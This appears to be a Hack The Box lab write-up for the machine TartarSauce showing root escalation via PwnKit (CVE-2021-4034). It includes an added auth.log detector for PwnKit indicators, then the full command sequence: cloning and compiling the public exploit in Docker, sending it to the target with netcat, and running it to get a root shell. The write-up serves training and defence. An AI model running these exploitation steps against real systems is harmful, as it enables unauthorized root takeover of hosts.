CVE-2021-4034


PEAS has discovered that the target system is vulnerable to CVE-2021-4034.

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec lets non-privileged processes communicate with privileged ones and provides a legitimate, authorized way to run commands with elevated privileges, similar to sudo.

A memory corruption flaw exists when pkexec is executed with no arguments. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
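Because the exploit has to pass through pkexec's environment validation, and pkexec writes the result of that check to syslog before printing the message that triggers the bug, the Qualys advisory notes that this technique leaves one of two messages in the authpriv log (auth.log on Ubuntu). The detector below is an added example, not part of this writeup or the berdav repository; the auth.log line layout it parses is assumed and the sample entries are constructed.

```python
import re
from dataclasses import dataclass

# Messages pkexec writes to syslog when its environment validation fails.
# The second one keeps the misspelling "suscipious" exactly as it appears in
# pkexec's source; a pattern with the corrected spelling would never match.
PWNKIT_INDICATORS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",
)

# Assumed line layout (shape of auth.log on Ubuntu; verify against your own logs):
# "<Mon dd hh:mm:ss> <host> pkexec[<pid>]: <invoking user>: <message> [USER=..] ..."
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s(?P<host>\S+)\spkexec\[(?P<pid>\d+)\]:\s"
    r"(?P<user>[^:]+):\s(?P<msg>.*)$"
)

@dataclass(frozen=True)
class PkexecAlert:
    ts: str
    host: str
    pid: int
    user: str       # account that invoked pkexec (the one to investigate)
    indicator: str  # which of the two messages fired

def scan_auth_log(lines):
    """Return one PkexecAlert per pkexec line that carries a PwnKit indicator."""
    alerts = []
    for line in lines:
        m = SYSLOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a pkexec entry (sudo, sshd, ...)
        hit = next((i for i in PWNKIT_INDICATORS if i in m["msg"]), None)
        if hit:
            alerts.append(PkexecAlert(m["ts"], m["host"], int(m["pid"]), m["user"].strip(), hit))
    return alerts

# Constructed sample lines: a sudo entry, two pkexec entries matching the
# indicators, and a normal pkexec authorization that must not alert.
SAMPLE_AUTH_LOG = [
    "Jan 26 11:46:12 tartarsauce sudo: www-data : command not allowed ; TTY=pts/0",
    "Jan 26 11:46:15 tartarsauce pkexec[4242]: www-data: The value for the SHELL variable "
    "was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/tmp] [COMMAND=pwnkit.so:.]",
    "Jan 26 11:47:01 tartarsauce pkexec[4250]: alice: The value for environment variable "
    "XAUTHORITY contains suscipious content [USER=root] [TTY=/dev/pts/1] [CWD=/home/alice] [COMMAND=/usr/bin/id]",
    "Jan 26 11:48:30 tartarsauce pkexec[4260]: alice: Executing command [USER=root] [TTY=/dev/pts/1] [CWD=/home/alice] [COMMAND=/usr/bin/id]",
]
```

Run `scan_auth_log(open("/var/log/auth.log"))` on a host to list the invoking user and PID of every suspicious pkexec call; a patched pkexec still logs these messages for genuinely malformed environments, so treat a hit as a lead to investigate rather than proof of compromise.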

Exploit: PwnKit


I found an exploit online; I will download it to Kali.

www-data@TartarSauce:/tmp$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

Since the target system doesn't have a compiler installed, I would have to compile the exploit elsewhere.

Docker Exploit Development


┌──(kali㉿kali)-[~/…/htb/labs/tartarsauce/kernelbuster]
└─$ docker run -it --entrypoint "/bin/bash" --name tartarsauce i386/ubuntu:16.04
Unable to find image 'i386/ubuntu:16.04' locally
16.04: Pulling from i386/ubuntu
1335d7ebdbbb: Pull complete 
ffa6a227af79: Pull complete 
ab3928723c2c: Pull complete 
e468001dd2f3: Pull complete 
Digest: sha256:bcb8397f1390f4f0757ca06ce184f05c8ce0c7a4b5ff93f9ab029a581192917b
Status: Downloaded newer image for i386/ubuntu:16.04

The target system is running Ubuntu 16.04 on an i686 architecture, which is part of the x86 family. The closest image I can get is i386.

root@50c55465f9ca:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

The glibc version matches that of the target system. All good to go.

root@50c55465f9ca:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Installing the necessary tools.

root@50c55465f9ca:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.
Checking connectivity... done.

Getting the exploit itself.

root@50c55465f9ca:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compilation complete.

root@50c55465f9ca:~/CVE-2021-4034# cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Package up the whole directory for delivery.

root@50c55465f9ca:~# nc 10.10.10.88 2222 < CVE-2021-4034.tar.gz
www-data@tartarsauce:/tmp$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.10] port 2222 [tcp/*] accepted (family 2, sport 44792)

Delivery complete.

Exploitation


www-data@TartarSauce:/tmp$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Unpack the archive and change into the exploit directory.

www-data@TartarSauce:/tmp/CVE-2021-4034$ ./cve-2021-4034

Execute.

# whoami
whoami
root
# hostname
hostname
TartarSauce
# ifconfig
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297144 errors:0 dropped:86 overruns:0 frame:0
          TX packets:1290102 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:281040868 (281.0 MB)  TX bytes:608855917 (608.8 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:39552 errors:0 dropped:0 overruns:0 frame:0
          TX packets:39552 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2933888 (2.9 MB)  TX bytes:2933888 (2.9 MB)

System Level Compromise